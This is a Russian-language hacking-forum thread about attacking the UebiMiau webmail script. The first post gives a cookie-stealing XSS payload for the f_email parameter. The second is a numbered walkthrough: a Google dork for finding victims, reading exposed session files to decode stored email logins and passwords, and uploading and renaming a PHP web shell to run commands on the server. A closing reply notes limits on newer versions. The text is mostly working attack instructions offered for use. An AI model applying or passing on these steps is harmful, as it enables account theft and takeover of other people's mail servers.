Самая простецкая пассивная XSS в параметре $f_email сценария index.php. Уязвимость существует из-за отсутсвия фильтрации указанного выше параметра: index.php: PHP: $smarty->display("$selected_theme/login.htm"); файл login.htm (шаблон): PHP: <input type="text" name="f_email" value="{$umEmail}" class="normal" style="width: 140px; border: 1 solid #7F9DB9;"> Пример: http://old.antichat.ru/webmail/index.php POST: f_email="><script>alert(document.cookie)</script> (да простят меня вышестоящие =)) P. S. Версию можно узнать из файла http://site.com/mail/docs/CHANGELOG.txt Нашел также раскрытие пути в этом же параметре, когда несколько раз менял значение фунции alert(). Почему работает пока не разобрался, но кажется что-то из-за значения поля Referer.
Google: allintitle: UebiMiau Получаем Shell через UebiMiau Mail Script Сразу подмечу, что не все системы уязвимы ... всё зависит от администратора сервера, ну и, конечно же, от настройки скрипта. Способ получение шелла: 1. Идём в Google и пишем: allintitle: UebiMiau 2. Нашёл жертву: http://webmail.victom.com/mail/ 3. Пишем: Code: http://webmail.victim.com/mail/database/_sessions 4. Если он эту папку откроет, то там наверни, будет файл с длинны названием {40DD724C8FE70-40DD724C8FE84-1088254540}.usf , открываем его там будет закодирован в текст в base64 5. декодируем base64 6. Когда разкодируем, получим сессию скрипта: Code: [..] a:9:{s:5:"email";s:13:"[email protected]";s:4:"user";s:3:"info";s:4:"pass";s:3:"abc123";s:6:"server";s [.] [...] s:67:"./database/info_victom.com/trash/236c1dc93c840d1194964cbc8a45ad15.eml"; [..] Как видна, мы получили логин и пароль от мэйла.. Логин: info Пароль: abc123 7. Заходим на майл жертвы http://webmail.victom.com/mail/ - создаём новоё письмо (Write E-Mail), и добавляем файл: (Attach new file) - зарания создаём файл shell.php с содержимым <? passthru($_GET['cmd]);?> 8. Когда добавили файл, болше нечего не надо делать (в смысле не надо заполнять остальные окна и не надо жать не каких кнопок.) 9. Проста, открываем новоё окно browsera, и пишем Code: http://webmail.victim.com/mail/database/info_victom.com/_attachments 10. Там будет наш файл тока перед ним будет md5. типа так: Code: a7fab2f55de08ab5c4bf23444cd676bbshell.php 11. Мы не думая, пищим: Code: http://webmail.victim.com/mail/database/info_victom.com/_attachments/a7fab2f55de08ab5c4bf23444cd676bbshell.php?cmd=mv a7fab2f55de08ab5c4bf23444cd676bbshell.php shell.php - эта для того, что бы избежать пропадания файла.. иначе он пропадёт.. Ну и в заключение - у нас появился полноценный Shell http://webmail.victim.com/mail/database/info_victom.com/_attachments/shell.php?cmd=id
Да, все это так. Только: 1) На последних версиях это не работает; 2) Индексация директорий, необходимая для атаки - тоже не самая частая вещь =(; 2) Умные админы (например, на g6 - так) вообще 301 ставят на эту директорию.
